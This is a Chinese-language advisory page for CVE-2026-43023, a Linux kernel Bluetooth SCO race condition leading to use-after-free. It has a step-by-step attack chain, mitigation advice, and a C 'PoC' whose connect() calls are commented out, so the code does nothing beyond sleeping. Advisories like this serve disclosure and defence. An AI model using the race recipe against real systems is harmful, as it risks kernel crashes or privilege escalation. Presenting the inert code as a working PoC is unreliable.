CVE-2026-43023 CVSS 7.8 高危

CVE-2026-43023 Linux内核蓝牙SCO竞态条件漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-43023

漏洞类型

竞态条件, 释放后重用

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核蓝牙SCO（同步连接导向）套接字处理中存在严重的竞态条件漏洞。在`sco_sock_connect()`函数中，由于在未持有套接字锁的情况下检查了`sk_state`和`sk_type`，导致两个并发的connect系统调用可能同时通过检查并进入`sco_connect()`函数。这种竞态场景下，当一个线程正在建立连接，而另一个线程或HCI断开事件清理了连接时，会导致释放后重用和双重引用计数减少。攻击者可利用此漏洞造成内核崩溃（拒绝服务）或潜在的权限提升。

技术细节

该漏洞的核心原理在于`sco_sock_connect()`函数的锁机制设计不当，存在检查与使用之间的竞态窗口。具体场景涉及线程A和线程B同时对同一socket发起connect操作。线程A建立连接`hcon1`并将其关联到`sk`，但在完成前，由于HCI断开事件，连接可能被` sco_conn_del`清理，将`sk`状态置为`BT_CLOSED`并解除关联。此时线程B恢复执行，尝试建立`hcon2`，并将`sk`重新关联到`conn2`，将已关闭的socket“复活”为`BT_CONNECT`状态。这导致后续清理逻辑触发双重释放和UAF。修复方案通过提前加锁、增加状态二次检查以及防止双重连接关联来解决此问题。

攻击链分析

STEP 1

步骤1

攻击者在本地创建一个蓝牙SCO套接字。

STEP 2

步骤2

攻击者创建两个并发线程（线程A和线程B），准备对同一个套接字发起连接操作。

STEP 3

步骤3

两个线程几乎同时调用connect()系统调用。由于sco_sock_connect()在未持有锁的情况下检查状态，两个线程都通过了BT_OPEN检查。

STEP 4

步骤4

线程A建立连接hcon1并关联socket。随后触发HCI断开事件（或模拟），导致连接被清理，socket状态变为BT_CLOSED。

STEP 5

步骤5

线程B恢复执行，建立连接hcon2，并将已关闭的socket重新关联，导致状态不一致和内存管理错误。

STEP 6

步骤6

触发Use-after-Free或双重释放，导致内核崩溃或潜在的代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/socket.h>
#include <unistd.h>
#include <bluetooth/bluetooth.h>
#include <bluetooth/sco.h>

// Target Bluetooth Address (Needs to be adjusted based on environment)
// bdaddr_t target = {{0x00, 0x11, 0x22, 0x33, 0x44, 0x55}};

void *thread_connect(void *arg) {
    int sock = *(int *)arg;
    struct sockaddr_sco addr;
    // memset(&addr, 0, sizeof(addr));
    // addr.sco_family = AF_BLUETOOTH;
    // bacpy(&addr.sco_bdaddr, &target);

    // Loop to increase race window probability
    for(int i = 0; i < 100; i++) {
        // connect(sock, (struct sockaddr *)&addr, sizeof(addr));
        // In a real PoC, specific HCI interactions might be needed to trigger the disconnect timing
        usleep(100); 
    }
    return NULL;
}

int main() {
    int sock = socket(AF_BLUETOOTH, SOCK_SEQPACKET, BTPROTO_SCO);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    pthread_t t1, t2;

    // Create two threads to race on the same socket
    pthread_create(&t1, NULL, thread_connect, &sock);
    pthread_create(&t2, NULL, thread_connect, &sock);

    pthread_join(t1, NULL);
    pthread_join(t2, NULL);

    close(sock);
    printf("Race condition attempt finished.\n");
    return 0;
}

影响范围

Linux Kernel (修复提交前的版本)

防御指南

临时缓解措施

建议尽快升级操作系统内核以修复此漏洞。对于无法立即重启更新的系统，应严格限制本地非特权用户的权限，防止恶意代码触发该竞态条件，从而避免系统崩溃或潜在的提权风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表